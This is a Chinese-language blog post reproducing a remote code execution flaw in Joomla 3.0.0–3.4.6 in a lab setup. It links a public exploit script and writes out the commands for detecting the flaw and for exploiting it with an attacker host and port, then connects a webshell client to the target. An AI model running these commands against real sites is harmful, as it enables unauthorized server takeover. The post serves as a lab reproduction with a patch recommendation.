Joomla 3.0.0 -3.4.6远程代码执行漏洞复现

漏洞概述

2019年10月2日,意大利安全公司 Hacktive Security的研究员 AlessandroGroppo 公开了影响 Joomla 内容管理系统老旧版本 3.0.0 至 3.4.6 (在2012年9月末至2015年12月中旬发布)的0day 详情。漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。它尚不存在 CVE 编号且易于利用,类似于 CVE-2015-8562。

漏洞影响版本

Joomla 3.0.0-3.4.6

复现环境

1、 Joomla 3.4.6
下载地址:https://downloads.joomla.org/cms/joomla3/3-4-6
2、靶机:win7(PHPStudy环境搭建)
攻击主机:kali2019

复现过程

1、将Joomla解压后,放入phpStudy\PHPTutorial\WWW下面在这里插入图片描述

2、访问http://xxx.xxx.xxx.xxx/Joomla后开始创建Joomla

在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
至此,Joomla已经安装完成。

3、下载脚本并进行检测该版本的Joomla是否有漏洞(出现Vulnerable则说明有漏洞)
下载地址:https://github.com/kiks7/rusty_joomla_rce

python3 joomla3.4.6-rce.py -t  http://靶机IP/Joomla/

在这里插入图片描述
结果显示该版本的Joomla确实有漏洞。

4、 利用脚本生成EXP进行攻击

python3 joomla3.4.6-rce.py -t  http://靶机IP/Joomla/ --exploit --lhost kali的IP --lport kali空闲端口

在这里插入图片描述
5、我们在靶机查看configuration.php
在这里插入图片描述
6、我们拿蚁剑进行连接
在这里插入图片描述
成功连接。至此,复现完成。

修复建议

将Joomla在官网上升级至最新版本。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值